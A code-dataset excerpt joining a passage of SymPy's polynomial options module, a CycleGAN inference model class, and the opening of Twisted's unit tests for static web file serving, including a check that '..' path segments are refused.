self[option] = cls.preprocess(value)
preprocess_options(args)
for key, value in dict(defaults).items():
if key in self:
del defaults[key]
else:
for option in self.keys():
cls = self.__options__[option]
if key in cls.excludes:
del defaults[key]
break
preprocess_options(defaults)
for option in self.keys():
cls = self.__options__[option]
for require_option in cls.requires:
if self.get(require_option) is None:
raise OptionError("'%s' option is only allowed together with '%s'" % (option, require_option))
for exclude_option in cls.excludes:
if self.get(exclude_option) is not None:
raise OptionError("'%s' option is not allowed together with '%s'" % (option, exclude_option))
for option in self.__order__:
self.__options__[option].postprocess(self)
@classmethod
def _init_dependencies_order(cls):
"""Resolve the order of options' processing. """
if cls.__order__ is None:
vertices, edges = [], set([])
for name, option in cls.__options__.items():
vertices.append(name)
for _name in option.after:
edges.add((_name, name))
for _name in option.before:
edges.add((name, _name))
try:
cls.__order__ = topological_sort((vertices, list(edges)))
except ValueError:
raise RuntimeError(
"cycle detected in sympy.polys options framework")
def clone(self, updates={}):
"""Clone ``self`` and update specified options. """
obj = dict.__new__(self.__class__)
for option, value in self.items():
obj[option] = value
for option, value in updates.items():
obj[option] = value
return obj
def __setattr__(self, attr, value):
if attr in self.__options__:
self[attr] = value
else:
super(Options, self).__setattr__(attr, value)
@property
def args(self):
args = {}
for option, value in self.items():
if value is not None and option != 'gens':
cls = self.__options__[option]
if not issubclass(cls, Flag):
args[option] = value
return args
@property
def options(self):
options = {}
for option, cls in self.__options__.items():
if not issubclass(cls, Flag):
options[option] = getattr(self, option)
return options
@property
def flags(self):
flags = {}
for option, cls in self.__options__.items():
if issubclass(cls, Flag):
flags[option] = getattr(self, option)
return flags
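# Illustrative usage note (not part of the original module): because OptionType
# registers a property on Options for every option it defines, parsed values can
# be read back as attributes, falling back to each option's default():
#
#     >>> from sympy.abc import x
#     >>> opt = Options((x,), {'domain': 'ZZ'})
#     >>> opt.domain
#     ZZ
#     >>> opt.expand      # not supplied, so Expand.default() is used
#     True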
class Expand(with_metaclass(OptionType, BooleanOption)):
"""``expand`` option to polynomial manipulation functions. """
option = 'expand'
requires = []
excludes = []
@classmethod
def default(cls):
return True
class Gens(with_metaclass(OptionType, Option)):
"""``gens`` option to polynomial manipulation functions. """
option = 'gens'
requires = []
excludes = []
@classmethod
def default(cls):
return ()
@classmethod
def preprocess(cls, gens):
if isinstance(gens, Basic):
gens = (gens,)
elif len(gens) == 1 and hasattr(gens[0], '__iter__'):
gens = gens[0]
if gens == (None,):
gens = ()
elif has_dups(gens):
raise GeneratorsError("duplicated generators: %s" % str(gens))
elif any(gen.is_commutative is False for gen in gens):
raise GeneratorsError("non-commutative generators: %s" % str(gens))
return tuple(gens)
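# Illustrative usage note (not part of the original module): ``Gens.preprocess``
# normalizes whatever was passed into a plain tuple of generators:
#
#     >>> from sympy.abc import x, y
#     >>> Gens.preprocess((x, y))
#     (x, y)
#     >>> Gens.preprocess(x)          # a single Basic instance is wrapped
#     (x,)
#     >>> Gens.preprocess((x, x))     # duplicates raise GeneratorsError
#     Traceback (most recent call last):
#     ...
#     GeneratorsError: duplicated generators: (x, x)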
class Wrt(with_metaclass(OptionType, Option)):
"""``wrt`` option to polynomial manipulation functions. """
option = 'wrt'
requires = []
excludes = []
_re_split = re.compile(r"\s*,\s*|\s+")
@classmethod
def preprocess(cls, wrt):
if isinstance(wrt, Basic):
return [str(wrt)]
elif isinstance(wrt, str):
wrt = wrt.strip()
if wrt.endswith(','):
raise OptionError('Bad input: missing parameter.')
if not wrt:
return []
return [ gen for gen in cls._re_split.split(wrt) ]
elif hasattr(wrt, '__getitem__'):
return list(map(str, wrt))
else:
raise OptionError("invalid argument for 'wrt' option")
class Sort(with_metaclass(OptionType, Option)):
"""``sort`` option to polynomial manipulation functions. """
option = 'sort'
requires = []
excludes = []
@classmethod
def default(cls):
return []
@classmethod
def preprocess(cls, sort):
if isinstance(sort, str):
return [ gen.strip() for gen in sort.split('>') ]
elif hasattr(sort, '__getitem__'):
return list(map(str, sort))
else:
raise OptionError("invalid argument for 'sort' option")
class Order(with_metaclass(OptionType, Option)):
"""``order`` option to polynomial manipulation functions. """
option = 'order'
requires = []
excludes = []
@classmethod
def default(cls):
return sympy.polys.orderings.lex
@classmethod
def preprocess(cls, order):
return sympy.polys.orderings.monomial_key(order)
class Field(with_metaclass(OptionType, BooleanOption)):
"""``field`` option to polynomial manipulation functions. """
option = 'field'
requires = []
excludes = ['domain', 'split', 'gaussian']
class Greedy(with_metaclass(OptionType, BooleanOption)):
"""``greedy`` option to polynomial manipulation functions. """
option = 'greedy'
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Composite(with_metaclass(OptionType, BooleanOption)):
"""``composite`` option to polynomial manipulation functions. """
option = 'composite'
@classmethod
def default(cls):
return None
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Domain(with_metaclass(OptionType, Option)):
"""``domain`` option to polynomial manipulation functions. """
option = 'domain'
requires = []
excludes = ['field', 'greedy', 'split', 'gaussian', 'extension']
after = ['gens']
_re_realfield = re.compile("^(R|RR)(_(\d+))?$")
_re_complexfield = re.compile("^(C|CC)(_(\d+))?$")
_re_finitefield = re.compile("^(FF|GF)\((\d+)\)$")
_re_polynomial = re.compile("^(Z|ZZ|Q|QQ)\[(.+)\]$")
_re_fraction = re.compile("^(Z|ZZ|Q|QQ)\((.+)\)$")
_re_algebraic = re.compile("^(Q|QQ)\<(.+)\>$")
@classmethod
def preprocess(cls, domain):
if isinstance(domain, sympy.polys.domains.Domain):
return domain
elif hasattr(domain, 'to_domain'):
return domain.to_domain()
elif isinstance(domain, string_types):
if domain in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ
if domain in ['Q', 'QQ']:
return sympy.polys.domains.QQ
if domain == 'EX':
return sympy.polys.domains.EX
r = cls._re_realfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.RR
else:
return sympy.polys.domains.RealField(int(prec))
r = cls._re_complexfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.CC
else:
return sympy.polys.domains.ComplexField(int(prec))
r = cls._re_finitefield.match(domain)
if r is not None:
return sympy.polys.domains.FF(int(r.groups()[1]))
r = cls._re_polynomial.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.poly_ring(*gens)
else:
return sympy.polys.domains.QQ.poly_ring(*gens)
r = cls._re_fraction.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.frac_field(*gens)
else:
return sympy.polys.domains.QQ.frac_field(*gens)
r = cls._re_algebraic.match(domain)
if r is not None:
gens = list(map(sympify, r.groups()[1].split(',')))
return sympy.polys.domains.QQ.algebraic_field(*gens)
raise OptionError('expected a valid domain specification, got %s' % domain)
@classmethod
def postprocess(cls, options):
if 'gens' in options and 'domain' in options and options['domain'].is_Composite and \
(set(options['domain'].symbols) & set(options['gens'])):
raise GeneratorsError(
"ground domain and generators interfere together")
elif ('gens' not in options or not options['gens']) and \
'domain' in options and options['domain'] == sympy.polys.domains.EX:
raise GeneratorsError("you have to provide generators because EX domain was requested")
class Split(with_metaclass(OptionType, BooleanOption)):
"""``split`` option to polynomial manipulation functions. """
option = 'split'
requires = []
excludes = ['field', 'greedy', 'domain', 'gaussian', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'split' in options:
raise NotImplementedError("'split' option is not implemented yet")
class Gaussian(with_metaclass(OptionType, BooleanOption)):
"""``gaussian`` option to polynomial manipulation functions. """
option = 'gaussian'
requires = []
excludes = ['field', 'greedy', 'domain', 'split', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'gaussian' in options and options['gaussian'] is True:
options['extension'] = set([S.ImaginaryUnit])
Extension.postprocess(options)
class Extension(with_metaclass(OptionType, Option)):
"""``extension`` option to polynomial manipulation functions. """
option = 'extension'
requires = []
excludes = ['greedy', 'domain', 'split', 'gaussian', 'modulus',
'symmetric']
@classmethod
def preprocess(cls, extension):
if extension == 1:
return bool(extension)
elif extension == 0:
raise OptionError("'False' is an invalid argument for 'extension'")
else:
if not hasattr(extension, '__iter__'):
extension = set([extension])
else:
if not extension:
extension = None
else:
extension = set(extension)
return extension
@classmethod
def postprocess(cls, options):
if 'extension' in options and options['extension'] is not True:
options['domain'] = sympy.polys.domains.QQ.algebraic_field(
*options['extension'])
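# Illustrative usage note (not part of the original module): passing algebraic
# numbers through ``extension`` makes ``postprocess`` install the corresponding
# algebraic number field as the ground domain:
#
#     >>> from sympy import sqrt
#     >>> opts = {'extension': Extension.preprocess(sqrt(2))}
#     >>> Extension.postprocess(opts)
#     >>> opts['domain']
#     QQ<sqrt(2)>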
class Modulus(with_metaclass(OptionType, Option)):
"""``modulus`` option to polynomial manipulation functions. """
option = 'modulus'
requires = []
excludes = ['greedy', 'split', 'domain', 'gaussian', 'extension']
@classmethod
def preprocess(cls, modulus):
modulus = sympify(modulus)
if modulus.is_Integer and modulus > 0:
return int(modulus)
else:
raise OptionError(
"'modulus' must a positive integer, got %s" % modulus)
@classmethod
def postprocess(cls, options):
if 'modulus' in options:
modulus = options['modulus']
symmetric = options.get('symmetric', True)
options['domain'] = sympy.polys.domains.FF(modulus, symmetric)
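# Illustrative usage note (not part of the original module): a ``modulus``
# option switches the ground domain to the corresponding finite field:
#
#     >>> opts = {'modulus': Modulus.preprocess(7)}
#     >>> Modulus.postprocess(opts)
#     >>> opts['domain']
#     GF(7)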
class Symmetric(with_metaclass(OptionType, BooleanOption)):
"""``symmetric`` option to polynomial manipulation functions. """
option = 'symmetric'
requires = ['modulus']
excludes = ['greedy', 'domain', 'split', 'gaussian', 'extension']
class Strict(with_metaclass(OptionType, BooleanOption)):
"""``strict`` option to polynomial manipulation functions. """
option = 'strict'
@classmethod
def default(cls):
return True
class Auto(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` flag to polynomial manipulation functions. """
option = 'auto'
after = ['field', 'domain', 'extension', 'gaussian']
@classmethod
def default(cls):
return True
@classmethod
def postprocess(cls, options):
if ('domain' in options or 'field' in options) and 'auto' not in options:
options['auto'] = False
class Frac(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` option to polynomial manipulation functions. """
option = 'frac'
@classmethod
def default(cls):
return False
class Formal(with_metaclass(OptionType, BooleanOption, Flag)):
"""``formal`` flag to polynomial manipulation functions. """
option = 'formal'
@classmethod
def default(cls):
return False
class Polys(with_metaclass(OptionType, BooleanOption, Flag)):
"""``polys`` flag to polynomial manipulation functions. """
option = 'polys'
class Include(with_metaclass(OptionType, BooleanOption, Flag)):
"""``include`` flag to polynomial manipulation functions. """
option = 'include'
@classmethod
def default(cls):
return False
class All(with_metaclass(OptionType, BooleanOption, Flag)):
"""``all`` flag to polynomial manipulation functions. """
option = 'all'
@classmethod
def default(cls):
return False
class Gen(with_metaclass(OptionType, Flag)):
"""``gen`` flag to polynomial manipulation functions. """
option = 'gen'
@classmethod
def default(cls):
return 0
@classmethod
def preprocess(cls, gen):
if isinstance(gen, (Basic, int)):
return gen
else:
raise OptionError("invalid argument for 'gen' option")
class Symbols(with_metaclass(OptionType, Flag)):
"""``symbols`` flag to polynomial manipulation functions. """
option = 'symbols'
@classmethod
def default(cls):
return numbered_symbols('s', start=1)
@classmethod
def preprocess(cls, symbols):
if hasattr(symbols, '__iter__'):
return iter(symbols)
else:
raise OptionError("expected an iterator or iterable container, got %s" % symbols)
class Method(with_metaclass(OptionType, Flag)):
"""``method`` flag to polynomial manipulation functions. """
option = 'method'
@classmethod
def preprocess(cls, method):
if isinstance(method, str):
return method.lower()
else:
raise OptionError("expected a string, got %s" % method)
def build_options(gens, args=None):
"""Construct options from keyword arguments or ... options. """
if args is None:
gens, args = (), gens
if len(args) != 1 or 'opt' not in args or gens:
return Options(gens, args)
else:
return args['opt']
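# Illustrative usage note (not part of the original module): ``build_options``
# either constructs a fresh Options instance or reuses one passed via 'opt':
#
#     >>> from sympy.abc import x
#     >>> opt = build_options((x,), {'domain': 'ZZ'})
#     >>> opt.domain, opt.gens
#     (ZZ, (x,))
#     >>> build_options({'opt': opt}) is opt
#     True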
def allowed_flags(args, flags):
"""
Allow specified flags to be used in the given context.
Examples
========
>>> from sympy.polys.polyoptions import allowed_flags
>>> from sympy.polys.domains import ZZ
>>> allowed_flags({'domain': ZZ}, [])
>>> allowed_flags({'domain': ZZ, 'frac': True}, [])
Traceback (most recent call last):
...
FlagError: 'frac' flag is not allowed in this context
>>> allowed_flags({'domain': ZZ, 'frac': True}, ['frac'])
"""
flags = set(flags)
for arg in args.keys():
try:
if Options.__options__[arg].is_Flag and arg not in flags:
raise FlagError(
"'%s' flag is not allowed in this context" % arg)
except KeyError:
raise OptionError("'%s' is not a valid option" % arg)
def set_defaults(options, **defaults):
"""Update options with default values. """
if 'defaults' not in options:
options = dict(options)
options['defaults'] = defaults
return options
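# Illustrative usage note (not part of the original module): ``set_defaults``
# only records fallback values under the 'defaults' key; Options.__init__
# applies them later for options the caller did not set explicitly:
#
#     >>> opts = set_defaults({'domain': 'ZZ'}, polys=False)
#     >>> opts['defaults']
#     {'polys': False}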
Options._init_dependencies_order()
| PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/polys/polyoptions.py | 20,846 |
from .base_model import BaseModel
from . import networks
from .cycle_gan_model import CycleGANModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = []
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = ['real_A', 'fake_B']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.norm, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def forward(self):
self.fake_B = self.netG(self.real_A)
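# Illustrative usage sketch (not part of the original file; the ``opt``
# namespace, the image tensor and BaseModel.setup are assumptions based on the
# surrounding framework, not guaranteed by this module):
#
#     model = TestModel()
#     model.initialize(opt)   # opt must carry isTrain=False, input_nc, netG, model_suffix, ...
#     model.setup(opt)        # assumed BaseModel helper that loads [epoch]_net_G[model_suffix].pth
#     model.set_input({'A': image_tensor, 'A_paths': ['input.png']})
#     model.forward()         # the translated image is now in model.fake_B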
| models/test_model.py | 1,726 |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import errno
import inspect
import mimetypes
import os
import re
import sys
import warnings
from io import BytesIO as StringIO
from unittest import skipIf
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import compat, log
from twisted.python.compat import networkString
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.requesthelper import DummyRequest
from twisted.web.test._util import _render
from twisted.web._responses import FOUND
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data(b"foo", "bar")
request = DummyRequest([''])
request.method = b'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data(b"foo", b"bar")
request = DummyRequest([b''])
request.method = b'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
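# Illustrative usage sketch (not part of the original test module): outside of
# these tests, L{static.Data} is typically mounted in a resource tree, e.g.
#
#     from twisted.web import resource, server, static
#     root = resource.Resource()
#     root.putChild(b"hello", static.Data(b"hello world", "text/plain"))
#     site = server.Site(root)   # serve via reactor.listenTCP(8080, site)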
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_ignoredExtTrue(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=1)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_ignoredExtFalse(self):
"""
Passing C{0} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=0)
self.assertEqual(file.ignoredExts, [])
self.assertEqual(len(caughtWarnings), 1)
def test_allowExt(self):
"""
Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), allowExt=1)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([b''])
request.method = b'POST'
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_emptyChildUnicodeParent(self):
"""
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
"""
textBase = FilePath(self.mktemp()).asTextMode()
textBase.makedirs()
textBase.child(u"text-file").open('w').close()
textFile = static.File(textBase.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(textFile, request)
self.assertIsInstance(child, static.DirectoryLister)
nativePath = compat.nativeString(textBase.path)
self.assertEqual(child.path, nativePath)
response = child.render(request)
self.assertIsInstance(response, bytes)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
@skipIf(platform.isWindows(), "Cannot remove read permission on Windows")
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0o700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([b''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
def test_undecodablePath(self):
"""
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
"""
path = self.mktemp()
if isinstance(path, bytes):
path = path.decode('ascii')
base = FilePath(path)
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b"\xff"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
self.assertEqual(len(self.flushLoggedErrors(UnicodeDecodeError)),
1)
d.addCallback(cbRendered)
return d
def test_forbiddenResource_default(self):
"""
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
"""
self.assertIsInstance(
static.File(b'.').forbidden, resource.ForbiddenResource)
def test_forbiddenResource_customize(self):
"""
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-forbidden-response'
def failingOpenForReading():
raise IOError(errno.EACCES, "")
class CustomForbiddenResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
forbidden = CustomForbiddenResource()
fileResource = CustomStaticFile(base.path)
fileResource.openForReading = failingOpenForReading
request = DummyRequest([b''])
result = fileResource.render(request)
self.assertEqual(markerResponse, result)
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
request = DummyRequest([b'foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
@skipIf(sys.getfilesystemencoding().lower() not in ('utf-8', 'mbcs'),
"Cannot write unicode filenames with file system encoding of"
" {}".format(sys.getfilesystemencoding()))
def test_staticFileUnicodeFileName(self):
"""
A request for an existing unicode file path encoded as UTF-8
returns the contents of that file.
"""
name = u"\N{GREEK SMALL LETTER ETA WITH PERISPOMENI}"
content = b"content"
base = FilePath(self.mktemp())
base.makedirs()
base.child(name).setContent(content)
file = static.File(base.path)
request = DummyRequest([name.encode('utf-8')])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), content)
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
networkString(str(len(content))))
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
child = staticFile.getChild(b"foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
request2 = DummyRequest([b'foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(b''.join(request.written),
b''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_getChildChildNotFound_customize(self):
"""
The resource rendered for child-not-found requests can be customized
using a class member.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-child-not-found-response'
class CustomChildNotFoundResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
childNotFound = CustomChildNotFoundResource()
fileResource = CustomStaticFile(base.path)
request = DummyRequest([b'no-child.txt'])
child = fileResource.getChild(b'no-child.txt', request)
result = child.render(request)
self.assertEqual(markerResponse, result)
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
request = DummyRequest([b''])
request.method = b'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual(b"".join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
b"from twisted.web.static import Data\n"
b"resource = Data(b'dynamic world', 'text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest([b"foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'dynamic world')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(b".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(b".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent(b'baz')
base.child('foo.quux').setContent(b'foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest([b"foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
d.addCallback(cbRendered)
return d
def test_directoryWithoutTrailingSlashRedirects(self):
"""
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('folder').makedirs()
file = static.File(base.path)
request = DummyRequest([b"folder"])
request.uri = b"http://dummy/folder#baz?foo=bar"
child = resource.getChildForRequest(file, request)
self.successResultOf(self._render(child, request))
self.assertEqual(request.responseCode, FOUND)
self.assertEqual(request.responseHeaders.getRawHeaders(b"location"),
[b"http://dummy/folder/#baz?foo=bar"])
def _makeFilePathWithStringIO(self):
"""
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
"""
fakeFile = StringIO()
path = FilePath(self.mktemp())
path.touch()
file = static.File(path.path)
# Open our file instead of a real one
file.open = lambda: fakeFile
return fakeFile, file
def test_HEADClosesFile(self):
"""
A HEAD request opens the file, gets the size, and then closes it after
the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'HEAD'
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
def test_cachedRequestClosesFile(self):
"""
A GET request that is cached closes the file after the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'GET'
# This request will always return saying that it is cached
request.setLastModified = lambda _: http.CACHED
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
"""
fileName = FilePath(self.mktemp())
fileName.setContent(content)
resource = static.File(fileName._asBytesPath())
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
"""
contentHeaders = {}
for k, v in request.responseHeaders.getAllRawHeaders():
if k.lower().startswith(b'content-'):
contentHeaders[k.lower()] = v[0]
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
b'a'*length, type=contentType, encoding=contentEncoding)
